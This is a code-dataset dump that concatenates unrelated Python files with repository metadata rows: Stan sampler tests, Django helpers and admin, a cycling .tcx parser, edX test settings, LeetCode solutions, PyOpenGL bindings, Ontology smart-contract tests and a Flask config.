'n_leapfrog__',
'divergent__',
'energy__',
]
phis = ['phi.{}'.format(str(x + 1)) for x in range(2095)]
column_names = sampler_state + phis
self.assertEqual(runset.columns, len(column_names))
self.assertEqual(runset.column_names, tuple(column_names))
self.assertEqual(runset.metric_type, 'diag_e')
self.assertEqual(runset.stepsize.shape, (2,))
self.assertEqual(runset.metric.shape, (2, 2095))
self.assertEqual((1000, 2, 2102), runset.sample.shape)
phis = get_drawset(runset, params=['phi'])
self.assertEqual((2000, 2095), phis.shape)
phi1 = get_drawset(runset, params=['phi.1'])
self.assertEqual((2000, 1), phi1.shape)
mo_phis = get_drawset(runset, params=['phi.1', 'phi.10', 'phi.100'])
self.assertEqual((2000, 3), mo_phis.shape)
phi2095 = get_drawset(runset, params=['phi.2095'])
self.assertEqual((2000, 1), phi2095.shape)
with self.assertRaises(Exception):
get_drawset(runset, params=['phi.2096'])
with self.assertRaises(Exception):
get_drawset(runset, params=['ph'])
class SummaryTest(unittest.TestCase):
def test_bernoulli(self):
stan = os.path.join(datafiles_path, 'bernoulli.stan')
exe = os.path.join(datafiles_path, 'bernoulli')
if not os.path.exists(exe):
compile_model(stan)
model = Model(stan, exe_file=exe)
jdata = os.path.join(datafiles_path, 'bernoulli.data.json')
post_sample = sample(
model, chains=4, cores=2, seed=12345, sampling_iters=200, data=jdata
)
df = summary(post_sample)
self.assertTrue(df.shape == (2, 9))
class DiagnoseTest(unittest.TestCase):
def diagnose_no_problems(self):
stan = os.path.join(datafiles_path, 'bernoulli.stan')
exe = os.path.join(datafiles_path, 'bernoulli')
if not os.path.exists(exe):
compile_model(stan)
model = Model(stan, exe_file=exe)
jdata = os.path.join(datafiles_path, 'bernoulli.data.json')
post_sample = sample(
model, chains=4, cores=2, seed=12345, sampling_iters=200, data=jdata
)
capturedOutput = io.StringIO()
sys.stdout = capturedOutput
diagnose(post_sample)
sys.stdout = sys.__stdout__
self.assertEqual(capturedOutput.getvalue(), 'No problems detected.\n')
def test_diagnose_divergences(self):
stan = os.path.join(datafiles_path, 'bernoulli.stan')
exe = os.path.join(datafiles_path, 'bernoulli')
model = Model(exe_file=exe, stan_file=stan)
output = os.path.join(
datafiles_path, 'diagnose-good', 'corr_gauss_depth8'
)
args = SamplerArgs(model, chain_ids=[1], output_file=output)
runset = RunSet(args=args, chains=1)
# TODO - use cmdstan test files instead
expected = ''.join(
[
'424 of 1000 (42%) transitions hit the maximum ',
'treedepth limit of 8, or 2^8 leapfrog steps. ',
'Trajectories that are prematurely terminated ',
'due to this limit will result in slow ',
'exploration and you should increase the ',
'limit to ensure optimal performance.\n',
]
)
capturedOutput = io.StringIO()
sys.stdout = capturedOutput
diagnose(runset)
sys.stdout = sys.__stdout__
self.assertEqual(capturedOutput.getvalue(), expected)
class SaveCsvfilesTest(unittest.TestCase):
def test_bernoulli(self):
stan = os.path.join(datafiles_path, 'bernoulli.stan')
exe = os.path.join(datafiles_path, 'bernoulli')
if not os.path.exists(exe):
compile_model(stan)
model = Model(stan, exe_file=exe)
jdata = os.path.join(datafiles_path, 'bernoulli.data.json')
post_sample = sample(
model, chains=4, cores=2, seed=12345, sampling_iters=200, data=jdata
)
for i in range(post_sample.chains):
csv_file = post_sample.csv_files[i]
txt_file = ''.join([os.path.splitext(csv_file)[0], '.txt'])
self.assertTrue(os.path.exists(csv_file))
self.assertTrue(os.path.exists(txt_file))
basename = 'bern_save_csvfiles_test'
save_csvfiles(post_sample, datafiles_path, basename) # good
for i in range(post_sample.chains):
csv_file = post_sample.csv_files[i]
self.assertTrue(os.path.exists(csv_file))
with self.assertRaisesRegex(Exception, 'cannot save'):
save_csvfiles(
post_sample, os.path.join('no', 'such', 'dir'), basename
)
with self.assertRaisesRegex(Exception, 'file exists'):
save_csvfiles(post_sample, datafiles_path, basename)
save_csvfiles(post_sample, basename=basename) # default dir
for i in range(post_sample.chains):
csv_file = post_sample.csv_files[i]
self.assertTrue(os.path.exists(csv_file))
for i in range(post_sample.chains): # cleanup
os.remove(post_sample.csv_files[i])
if __name__ == '__main__':
unittest.main()
| 11,224 | 101 | 510 |
76f40d02bacdbe3d6b3f25ee64fc6153b4cf533b | 404 | py | Python | django/app/tasks.py | shimakaze-git/docker_django_celery_vote | 0b0899a9fb4d817ff5966e9d1f1f027755e585cf | [
"BSD-2-Clause"
] | null | null | null | django/app/tasks.py | shimakaze-git/docker_django_celery_vote | 0b0899a9fb4d817ff5966e9d1f1f027755e585cf | [
"BSD-2-Clause"
] | null | null | null | django/app/tasks.py | shimakaze-git/docker_django_celery_vote | 0b0899a9fb4d817ff5966e9d1f1f027755e585cf | [
"BSD-2-Clause"
] | null | null | null | from django.template.loader import get_template | 26.933333 | 47 | 0.685644 | from django.template.loader import get_template
def get_message(item, action):
template = get_template('app/message.txt')
context = {
"item": item,
"action": action,
}
message = template.render(context)
return message
def send_notification(item, action):
message = get_message(item, action)
# send_slack_message.delay(message)
# send_email.delay(message) | 311 | 0 | 46 |
f2d98036f31e9ac0c6c4d125d74180c592d5c6c2 | 1,782 | py | Python | functions/getTcxData.py | TomBolton/aeroCode | 7e26ffb295cb76367a57993420fb93f976df9199 | [
"MIT"
] | 1 | 2016-12-18T18:36:47.000Z | 2016-12-18T18:36:47.000Z | functions/getTcxData.py | TomBolton/aeroCode | 7e26ffb295cb76367a57993420fb93f976df9199 | [
"MIT"
] | null | null | null | functions/getTcxData.py | TomBolton/aeroCode | 7e26ffb295cb76367a57993420fb93f976df9199 | [
"MIT"
] | null | null | null | # This script will extract the important ride data from a .tcx
# file specified by the user. The code below will then extract
# the speed and power values at each time step. The data recording
# of the Garmin MUST be set to one data point per second, as the
# analysis assumes a time-step of 1 second.
import lxml.etree as ET
import os
from os import path
| 34.269231 | 100 | 0.615039 | # This script will extract the important ride data from a .tcx
# file specified by the user. The code below will then extract
# the speed and power values at each time step. The data recording
# of the Garmin MUST be set to one data point per second, as the
# analysis assumes a time-step of 1 second.
import lxml.etree as ET
import os
from os import path
def getTcxData( fileName ) : # Input is the filename, e.g. my_ride.tcx.
# Make a string of the path to the tcx file.
pathStr = str( path.realpath( fileName ) )
# Read .tcx file into a Document Object Model (DOM).
dom = ET.parse( pathStr )
root = dom.getroot()
# We're interested in the distance travelled and watts. The route to
# watts is the following:
#
# <Element>
# <TraingCenterDatabase ...>
# <Activities>
# <Activity Sport="Biking">
# <Lap StartTime="...">
# <Track>
# <Trackpoint>
# <Extensions>
#
trackPoints = root[0][0][1][9] # This extracts the moment-by-moment data from the xml tree.
powerList = []
speedList = []
# Loop through the track points and extract both the power and speed data
for i in range(2,len(trackPoints)-1) :
powerList.append( int( trackPoints[i][7][0][0].text ) )
speedList.append( float( trackPoints[i][3].text ) - float( trackPoints[i-1][3].text ) )
# The turning around points sometimes register as zero speed even though
# the cyclist is still moving. Therefore replace the zero values with a
# small value of 0.5m/s.
for i in range(0, len(speedList)) :
if speedList[i] < 0.2 :
speedList[i] = 0.5
return [powerList,speedList]
| 1,401 | 0 | 23 |
4b834fdd7c8b2ebcd71b69384ea4dad7f6c6b6c1 | 295 | py | Python | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/common/test/acceptance/pages/lms/__init__.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 3 | 2021-12-15T04:58:18.000Z | 2022-02-06T12:15:37.000Z | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/common/test/acceptance/pages/lms/__init__.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | null | null | null | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/common/test/acceptance/pages/lms/__init__.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 1 | 2019-01-02T14:38:50.000Z | 2019-01-02T14:38:50.000Z | """
Package of lms page objects for acceptance tests
"""
import os
# Get the URL of the instance under test
HOSTNAME = os.environ.get('BOK_CHOY_HOSTNAME', 'localhost')
LMS_PORT = os.environ.get('BOK_CHOY_LMS_PORT', 8003)
BASE_URL = os.environ.get('test_url', f'http://{HOSTNAME}:{LMS_PORT}')
| 24.583333 | 70 | 0.732203 | """
Package of lms page objects for acceptance tests
"""
import os
# Get the URL of the instance under test
HOSTNAME = os.environ.get('BOK_CHOY_HOSTNAME', 'localhost')
LMS_PORT = os.environ.get('BOK_CHOY_LMS_PORT', 8003)
BASE_URL = os.environ.get('test_url', f'http://{HOSTNAME}:{LMS_PORT}')
| 0 | 0 | 0 |
d1cf3c14f61b807c9522bcfdd5c5441669891163 | 622 | py | Python | web/ml/admin.py | MTES-MCT/biocarburants | ff084916e18cdbdc41400f36fa6cc76a5e05900e | [
"MIT"
] | null | null | null | web/ml/admin.py | MTES-MCT/biocarburants | ff084916e18cdbdc41400f36fa6cc76a5e05900e | [
"MIT"
] | 1 | 2020-02-17T11:01:03.000Z | 2020-02-17T11:01:03.000Z | web/ml/admin.py | MTES-MCT/biocarburants | ff084916e18cdbdc41400f36fa6cc76a5e05900e | [
"MIT"
] | null | null | null | from django.contrib import admin
# Register your models here.
from ml.models import EECStats, EPStats, ETDStats
@admin.register(EECStats)
@admin.register(EPStats)
@admin.register(ETDStats)
| 34.555556 | 123 | 0.737942 | from django.contrib import admin
# Register your models here.
from ml.models import EECStats, EPStats, ETDStats
@admin.register(EECStats)
class EECStatsAdmin(admin.ModelAdmin):
list_display = ('feedstock', 'origin', 'nb_lots', 'default_value', 'stddev', 'average')
list_filter = ('feedstock', 'origin',)
@admin.register(EPStats)
class EPStatsAdmin(admin.ModelAdmin):
list_display = ('feedstock', 'biofuel', 'nb_lots', 'default_value_min_ep', 'default_value_max_ep', 'stddev', 'average')
@admin.register(ETDStats)
class ETDStatsAdmin(admin.ModelAdmin):
list_display = ('feedstock', 'default_value')
| 0 | 359 | 66 |
f8bb05792786b247bfb57d1e945a780db3af525b | 2,816 | py | Python | leetcode/Depth First Search & Backtracking/112. Path Sum.py | yanshengjia/algorithm | 0608d286be9c93d51768d47f21e569c6b0be9cda | [
"MIT"
] | 23 | 2019-08-02T12:02:47.000Z | 2022-03-09T15:24:16.000Z | leetcode/Depth First Search & Backtracking/112. Path Sum.py | yanshengjia/algorithm | 0608d286be9c93d51768d47f21e569c6b0be9cda | [
"MIT"
] | null | null | null | leetcode/Depth First Search & Backtracking/112. Path Sum.py | yanshengjia/algorithm | 0608d286be9c93d51768d47f21e569c6b0be9cda | [
"MIT"
] | 21 | 2019-12-22T04:47:32.000Z | 2021-09-12T14:29:35.000Z | """
Given a binary tree and a sum, determine if the tree has a root-to-leaf path such that adding up all the values along the path equals the given sum.
Note: A leaf is a node with no children.
Example:
Given the below binary tree and sum = 22,
5
/ \
4 8
/ / \
11 13 4
/ \ \
7 2 1
return true, as there exist a root-to-leaf path 5->4->11->2 which sum is 22.
Solution:
1. dfs + recursion
2. bfs + stack
So we start from a stack which contains the root node and the corresponding remaining sum which is sum - root.val. Then we proceed to the iterations: pop the current node out of the stack and return True if the remaining sum is 0 and we're on the leaf node. If the remaining sum is not zero or we're not on the leaf yet then we push the child nodes and corresponding remaining sums into stack.
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# DFS + Recursion
# Time-O(N), where N is the number of nodes in the tree
# Space-worst O(N), best O(logN)
# Space complexity : in the worst case, the tree is completely unbalanced, e.g. each node has only one child node, the recursion call would occur NN times (the height of the tree), therefore the storage to keep the call stack would be \mathcal{O}(N)O(N). But in the best case (the tree is completely balanced), the height of the tree would be \log(N)log(N). Therefore, the space complexity in this case would be \mathcal{O}(\log(N))O(log(N)).
# BFS + Stack
# Use stack to store each node's condition, [node, remaining value], updating the remaining sum to cumulate at each visit.
# Time - O(N)
# Space - [O(logN), O(N)]
| 36.571429 | 443 | 0.615767 | """
Given a binary tree and a sum, determine if the tree has a root-to-leaf path such that adding up all the values along the path equals the given sum.
Note: A leaf is a node with no children.
Example:
Given the below binary tree and sum = 22,
5
/ \
4 8
/ / \
11 13 4
/ \ \
7 2 1
return true, as there exist a root-to-leaf path 5->4->11->2 which sum is 22.
Solution:
1. dfs + recursion
2. bfs + stack
So we start from a stack which contains the root node and the corresponding remaining sum which is sum - root.val. Then we proceed to the iterations: pop the current node out of the stack and return True if the remaining sum is 0 and we're on the leaf node. If the remaining sum is not zero or we're not on the leaf yet then we push the child nodes and corresponding remaining sums into stack.
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# DFS + Recursion
# Time-O(N), where N is the number of nodes in the tree
# Space-worst O(N), best O(logN)
# Space complexity : in the worst case, the tree is completely unbalanced, e.g. each node has only one child node, the recursion call would occur NN times (the height of the tree), therefore the storage to keep the call stack would be \mathcal{O}(N)O(N). But in the best case (the tree is completely balanced), the height of the tree would be \log(N)log(N). Therefore, the space complexity in this case would be \mathcal{O}(\log(N))O(log(N)).
class Solution:
def hasPathSum(self, root: TreeNode, sum: int) -> bool:
if root == None:
return False
if root.val == sum and root.left == None and root.right == None:
return True
else:
left = self.hasPathSum(root.left, sum - root.val)
right = self.hasPathSum(root.right, sum - root.val)
if left or right:
return True
else:
return False
# BFS + Stack
# Use stack to store each node's condition, [node, remaining value], updating the remaining sum to cumulate at each visit.
# Time - O(N)
# Space - [O(logN), O(N)]
class Solution:
def hasPathSum(self, root, sum):
"""
:type root: TreeNode
:type sum: int
:rtype: bool
"""
if not root:
return False
de = [(root, sum - root.val), ]
while len(de) > 0:
node, curr_sum = de.pop()
if not node.left and not node.right and curr_sum == 0:
return True
if node.right:
de.append((node.right, curr_sum - node.right.val))
if node.left:
de.append((node.left, curr_sum - node.left.val))
return False
| 426 | 577 | 70 |
b1e550d7831a4be263bbb48382a1b7866b34b3ed | 694 | py | Python | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GLX/MESA/pixmap_colormap.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GLX/MESA/pixmap_colormap.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GLX/MESA/pixmap_colormap.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLX import _types as _cs
# End users want this...
from OpenGL.raw.GLX._types import *
from OpenGL.raw.GLX import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLX_MESA_pixmap_colormap'
@_f
@_p.types(_cs.GLXPixmap,ctypes.POINTER(_cs.Display),ctypes.POINTER(_cs.XVisualInfo),_cs.Pixmap,_cs.Colormap)
| 38.555556 | 120 | 0.783862 | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLX import _types as _cs
# End users want this...
from OpenGL.raw.GLX._types import *
from OpenGL.raw.GLX import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLX_MESA_pixmap_colormap'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLX,'GLX_MESA_pixmap_colormap',error_checker=_errors._error_checker)
@_f
@_p.types(_cs.GLXPixmap,ctypes.POINTER(_cs.Display),ctypes.POINTER(_cs.XVisualInfo),_cs.Pixmap,_cs.Colormap)
def glXCreateGLXPixmapMESA(dpy,visual,pixmap,cmap):pass
| 153 | 0 | 46 |
64e6de1504c2c09f42075f8ff35b9b1da282039e | 7,215 | py | Python | models/agents.py | michchr/HybridControlPy | 75d64810956fade5360f18b81332a781b31eebf9 | [
"MIT"
] | 1 | 2020-05-16T07:10:51.000Z | 2020-05-16T07:10:51.000Z | models/agents.py | michchr/HybridControlPy | 75d64810956fade5360f18b81332a781b31eebf9 | [
"MIT"
] | null | null | null | models/agents.py | michchr/HybridControlPy | 75d64810956fade5360f18b81332a781b31eebf9 | [
"MIT"
] | 1 | 2022-02-10T03:15:28.000Z | 2022-02-10T03:15:28.000Z | import bisect
from collections import OrderedDict
from reprlib import recursive_repr as _recursive_repr
# import pandas as pd
# pd.set_option('mode.chained_assignment', 'raise')
from controllers.mpc_controller import MpcController
from controllers.controller_base import ControllerBase
from structdict import StructDict, struct_repr, named_struct_dict
from models.mld_model import MldSystemModel, MldModel, MldInfo
from utils.func_utils import ParNotSet
from utils.helper_funcs import is_all_None
from typing import MutableMapping, AnyStr
| 37.774869 | 120 | 0.691892 | import bisect
from collections import OrderedDict
from reprlib import recursive_repr as _recursive_repr
# import pandas as pd
# pd.set_option('mode.chained_assignment', 'raise')
from controllers.mpc_controller import MpcController
from controllers.controller_base import ControllerBase
from structdict import StructDict, struct_repr, named_struct_dict
from models.mld_model import MldSystemModel, MldModel, MldInfo
from utils.func_utils import ParNotSet
from utils.helper_funcs import is_all_None
from typing import MutableMapping, AnyStr
class Agent:
_device_type_id_struct = StructDict()
def __init__(self, device_type=None, device_id=None,
sim_model: MldSystemModel = ParNotSet,
control_model: MldSystemModel = ParNotSet):
self._device_type = None
self._device_id = None
self._sim_model = None
self._control_model = None
self.update_device_data(device_type=device_type, device_id=device_id)
self.update_models(sim_model=sim_model, control_model=control_model)
# todo Still needs work
@classmethod
def delete_all_devices(cls):
cls._device_type_id_struct.clear()
def update_device_data(self, device_type=None, device_id=None):
self._device_type = device_type if device_type is not None else self._device_type or 'not_specified'
self._device_id = device_id if device_id is not None else self._device_id
if self._device_type in self._device_type_id_struct:
_id_set = self._device_type_id_struct[self._device_type].id_set
_id_list = self._device_type_id_struct[self._device_type].id_list
if self.device_id in _id_set:
raise ValueError(
"Agent with type:'{}' and device_id:'{}' already exists".format(self._device_type, self.device_id))
elif self.device_id is None:
self._device_id = (_id_list[-1] + 1) if _id_list else 1
_id_set.add(self._device_id)
bisect.insort(_id_list, self._device_id)
else:
if self.device_id is None:
self._device_id = 1
self._device_type_id_struct[self._device_type] = StructDict(id_set=set(), id_list=[])
self._device_type_id_struct[self._device_type].id_set.add(self._device_id)
self._device_type_id_struct[self._device_type].id_list.append(self._device_id)
def update_models(self, sim_model: MldSystemModel = ParNotSet,
control_model: MldSystemModel = ParNotSet):
if is_all_None(self._sim_model, self._control_model, sim_model, control_model):
self._sim_model = MldSystemModel()
self._control_model = None
else:
self._sim_model = sim_model if sim_model is not ParNotSet else self._sim_model or MldSystemModel()
self._control_model = control_model if control_model is not ParNotSet else self._control_model or None
# todo think about cleanup
def __del__(self):
# print("deleting")
for col in self._device_type_id_struct[self._device_type].values():
try:
col.remove(self._device_id)
except Exception:
pass
@property
def device_type(self):
return self._device_type
@property
def device_id(self):
return self._device_id
@property
def sim_model(self) -> MldSystemModel:
return self._sim_model
@property
def control_model(self) -> MldSystemModel:
return self._control_model if self._control_model is not None else self._sim_model
@property
def mld_numeric(self) -> MldModel:
return self._sim_model._mld_numeric
@property
def mld_info(self) -> MldInfo:
return self.mld_numeric.mld_info
@property
def mld_numeric_tilde(self):
return None
@_recursive_repr()
def __repr__(self):
repr_dict = OrderedDict(device_type=self.device_type,
device_id=self.device_id,
sim_model=self.sim_model,
control_model=self.control_model)
return struct_repr(repr_dict, type_name=self.__class__.__name__)
class ControlledAgent(Agent):
ControllersStruct = named_struct_dict('ControllersStruct')
def __init__(self, device_type=None, device_id=None, sim_model=None, control_model=None):
self._controllers: MutableMapping[AnyStr, ControllerBase] = self.ControllersStruct()
super().__init__(device_type=device_type, device_id=device_id, sim_model=sim_model, control_model=control_model)
def update_models(self, sim_model: MldSystemModel = ParNotSet,
control_model: MldSystemModel = ParNotSet):
super(ControlledAgent, self).update_models(sim_model=sim_model, control_model=control_model)
for controller in self.controllers.values():
controller.reset_components()
@property
def controllers(self):
return self._controllers
def add_controller(self, name, controller_type, x_k=None, omega_tilde_k=None, N_p=None, N_tilde=None):
self._controllers[name] = controller_type(agent=self, x_k=x_k, omega_tilde_k=omega_tilde_k, N_p=N_p,
N_tilde=N_tilde)
def delete_controller(self, name):
del self._controllers[name]
def delete_all_controllers(self):
self._controllers.clear()
class MpcAgent(Agent):
def __init__(self, device_type=None, device_id=None, sim_model=None, control_model=None, N_p=None, N_tilde=None):
super().__init__(device_type=device_type, device_id=device_id, sim_model=sim_model, control_model=control_model)
self._mpc_controller = MpcController(agent=self, N_p=N_p, N_tilde=N_tilde)
def update_models(self, sim_model: MldSystemModel = ParNotSet,
control_model: MldSystemModel = ParNotSet):
super(MpcAgent, self).update_models(sim_model=sim_model, control_model=control_model)
mpc_controller: MpcController = getattr(self, '_mpc_controller', None)
if mpc_controller:
mpc_controller.reset_components()
def update_horizons(self, N_p=ParNotSet, N_tilde=ParNotSet):
N_p = N_p if N_p is not ParNotSet else self.N_p or 0
N_tilde = N_tilde if N_tilde is not ParNotSet else N_p + 1
self._mpc_controller.update_horizons(N_p=N_p, N_tilde=N_tilde)
@property
def mpc_controller(self) -> MpcController:
return self._mpc_controller
@property
def N_p(self):
return self._mpc_controller.N_p if self._mpc_controller else None
@property
def N_tilde(self):
return self._mpc_controller.N_tilde if self._mpc_controller else None
@property
def x_k(self):
return self._mpc_controller.x_k
@x_k.setter
def x_k(self, x_k):
self._mpc_controller.x_k = x_k
@property
def omega_tilde_k_hat(self):
return self._mpc_controller.omega_tilde_k
@omega_tilde_k_hat.setter
def omega_tilde_k_hat(self, omega_tilde_k_hat):
self._mpc_controller.omega_tilde_k = omega_tilde_k_hat
| 5,385 | 1,215 | 69 |
e7c5b2a3eb3df4f97e0326f7ff5cf6ac5fce2de0 | 4,208 | py | Python | test/test_invoke_saving_pot.py | punica-box/saving-pot-box | 8824e3621b21a8e06ac398c29e7ec07ac1442d1f | [
"MIT"
] | 1 | 2018-11-17T10:37:38.000Z | 2018-11-17T10:37:38.000Z | test/test_invoke_saving_pot.py | NashMiao/saving-pot-box | 0ea7b0ee4be8aadf069faacf1d862d7412d5b4da | [
"MIT"
] | null | null | null | test/test_invoke_saving_pot.py | NashMiao/saving-pot-box | 0ea7b0ee4be8aadf069faacf1d862d7412d5b4da | [
"MIT"
] | 1 | 2018-11-10T15:56:58.000Z | 2018-11-10T15:56:58.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import binascii
import time
import unittest
from unittest.mock import patch
from ontology.ont_sdk import OntologySdk
from ontology.smart_contract.neo_contract.abi.abi_function import AbiFunction
from ontology.smart_contract.neo_contract.abi.abi_info import AbiInfo
from ontology.wallet.wallet_manager import WalletManager
from pot.default_settings import (
GAS_LIMIT,
GAS_PRICE,
WALLET_PATH,
CONTRACT_ABI,
ONT_RPC_ADDRESS,
CONTRACT_ADDRESS_HEX
)
from pot.invoke_saving_pot import InvokeSavingPot
ontology = OntologySdk()
remote_rpc_address = 'http://polaris3.ont.io:20336'
ontology.set_rpc(remote_rpc_address)
wallet_manager = WalletManager()
wallet_manager.open_wallet(WALLET_PATH)
password = input('password: ')
gas_limit = 20000000
gas_price = 500
acct = wallet_manager.get_account('AKeDu9QW6hfAhwpvCwNNwkEQt1LkUQpBpW', password)
saving_pot = InvokeSavingPot(ontology, CONTRACT_ABI, CONTRACT_ADDRESS_HEX)
if __name__ == '__main__':
unittest.main()
| 38.605505 | 89 | 0.73788 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import binascii
import time
import unittest
from unittest.mock import patch
from ontology.ont_sdk import OntologySdk
from ontology.smart_contract.neo_contract.abi.abi_function import AbiFunction
from ontology.smart_contract.neo_contract.abi.abi_info import AbiInfo
from ontology.wallet.wallet_manager import WalletManager
from pot.default_settings import (
GAS_LIMIT,
GAS_PRICE,
WALLET_PATH,
CONTRACT_ABI,
ONT_RPC_ADDRESS,
CONTRACT_ADDRESS_HEX
)
from pot.invoke_saving_pot import InvokeSavingPot
ontology = OntologySdk()
remote_rpc_address = 'http://polaris3.ont.io:20336'
ontology.set_rpc(remote_rpc_address)
wallet_manager = WalletManager()
wallet_manager.open_wallet(WALLET_PATH)
password = input('password: ')
gas_limit = 20000000
gas_price = 500
acct = wallet_manager.get_account('AKeDu9QW6hfAhwpvCwNNwkEQt1LkUQpBpW', password)
saving_pot = InvokeSavingPot(ontology, CONTRACT_ABI, CONTRACT_ADDRESS_HEX)
class TestInvokeSavingPot(unittest.TestCase):
def test_create_ont_pot(self):
time_limit = 60
tx_hash = saving_pot.create_ont_pot(acct, time_limit, GAS_LIMIT, GAS_PRICE)
self.assertEqual(64, len(tx_hash))
def test_create_ong_pot(self):
time_limit = 60
tx_hash = saving_pot.create_ong_pot(acct, time_limit, GAS_LIMIT, GAS_PRICE)
self.assertEqual(64, len(tx_hash))
print(tx_hash)
def test_put_get_ont_pot_tx_hash(self):
tx_hash = '88ba0f7d36aaaad08b9fa23bd85f202da64eb8baa2ed9204f9a89b1882a34dd8'
saving_pot.put_ont_pot_tx_hash(acct, tx_hash, GAS_LIMIT, GAS_PRICE)
data = saving_pot.get_ont_pot_tx_hash(acct.get_address().to_array())
self.assertEqual(tx_hash, data)
def test_put_get_ong_pot_tx_hash(self):
tx_hash = '861d6ecfca6413639f753d53d1267637a410930552546443f287f43af6877181'
saving_pot.put_ong_pot_tx_hash(acct, tx_hash, GAS_LIMIT, GAS_PRICE)
data = saving_pot.get_ong_pot_tx_hash(acct.get_address().to_array())
self.assertEqual(tx_hash, data)
def test_saving_ont(self):
amount = 1
balance1 = ontology.rpc.get_balance(acct.get_address_base58())
tx_hash = saving_pot.saving_ont(acct, amount, GAS_LIMIT, GAS_PRICE)
self.assertEqual(64, len(tx_hash))
time.sleep(6)
print(ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash))
balance2 = ontology.rpc.get_balance(acct.get_address_base58())
self.assertEqual(balance1, balance2 + 1)
def test_saving_ong(self):
amount = 1
print(ontology.rpc.get_balance(acct.get_address_base58()))
tx_hash = saving_pot.saving_ong(acct, amount, GAS_LIMIT, GAS_PRICE)
self.assertEqual(64, len(tx_hash))
time.sleep(6)
print(ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash))
print(ontology.rpc.get_balance(acct.get_address_base58()))
def test_take_ont_out(self):
tx_hash = saving_pot.take_ong_out(acct, GAS_LIMIT, GAS_PRICE)
print(tx_hash)
def test_take_ong_out(self):
tx_hash = saving_pot.take_ong_out(acct, GAS_LIMIT, GAS_PRICE)
print(tx_hash)
def test_query_ont_pot_saving_time(self):
saving_time = saving_pot.query_ont_pot_saving_time(acct.get_address().to_array())
self.assertEqual(60, saving_time)
def test_query_ong_pot_saving_time(self):
print(acct.get_address().to_array())
print(type(acct.get_address().to_array()))
saving_time = saving_pot.query_ong_pot_saving_time(acct.get_address().to_array())
self.assertEqual(60, saving_time)
def test_query_create_pot_event(self):
tx_hash = 'a772593b4755c0d412b824617a8cc5564ef75f20623417a6cc97cf3a727819a0'
event = saving_pot.query_create_pot_event(tx_hash)
self.assertIn('saving time', event)
self.assertIn('2018-11-22 20:14:32', event)
tx_hash = '25224b02bd5d89b4c5f4a1da322162ffc4fe0c2a1c7ab1dc3f8a0c080be63eca'
event = saving_pot.query_create_pot_event(tx_hash)
self.assertIn('saving time', event)
self.assertIn('2018-11-22 20:58:30', event)
if __name__ == '__main__':
unittest.main()
| 2,833 | 24 | 319 |
3819d955d228cdd08ec15658407df47f685a3639 | 784 | py | Python | config.py | apython1998/porchfest_radio | d120578e90c99606d59868adbf19a2e2d3775dc9 | [
"MIT"
] | null | null | null | config.py | apython1998/porchfest_radio | d120578e90c99606d59868adbf19a2e2d3775dc9 | [
"MIT"
] | 1 | 2021-04-30T20:44:10.000Z | 2021-04-30T20:44:10.000Z | config.py | apython1998/porchfest_radio | d120578e90c99606d59868adbf19a2e2d3775dc9 | [
"MIT"
] | null | null | null | import os
from dotenv import load_dotenv
basedir = os.path.abspath(os.path.dirname(__file__))
load_dotenv(os.path.join(basedir, '.env'))
| 39.2 | 71 | 0.701531 | import os
from dotenv import load_dotenv
basedir = os.path.abspath(os.path.dirname(__file__))
load_dotenv(os.path.join(basedir, '.env'))
class Config(object):
SECRET_KEY = os.environ.get('SECRET_KEY') or 'you-will-never-guess'
MONGODB_SETTINGS = {
'db': 'porchfest_radio',
'host': 'mongodb://localhost/porchfest_radio'
}
ADMINS = os.environ.get('ADMINS') or 'your.email@example.com'
UPLOAD_FOLDER = os.environ.get('UPLOAD_FOLDER') or 'uploads/'
S3_BUCKET = os.environ.get('S3_BUCKET_NAME') or None
S3_KEY = os.environ.get('S3_ACCESS_KEY') or None
S3_SECRET = os.environ.get('S3_SECRET_ACCESS_KEY') or None
S3_LOCATION = 'http://{}.s3.amazonaws.com/'.format(S3_BUCKET)
CLOUDFRONT_URL = os.environ.get('CLOUDFRONT_URL') or None
| 0 | 623 | 23 |
f5c5906f366de46db049d2907d3e8017997f8386 | 619 | py | Python | src/main/python/leetcode-python/easy/400.Nth Digit.py | sonymoon/algorithm | cc2a9e0125fc64bdbf6549034bad6482d2027ea2 | [
"Apache-2.0"
] | null | null | null | src/main/python/leetcode-python/easy/400.Nth Digit.py | sonymoon/algorithm | cc2a9e0125fc64bdbf6549034bad6482d2027ea2 | [
"Apache-2.0"
] | null | null | null | src/main/python/leetcode-python/easy/400.Nth Digit.py | sonymoon/algorithm | cc2a9e0125fc64bdbf6549034bad6482d2027ea2 | [
"Apache-2.0"
] | null | null | null |
print(Solution().findNthDigit(194))
| 24.76 | 65 | 0.434572 | class Solution:
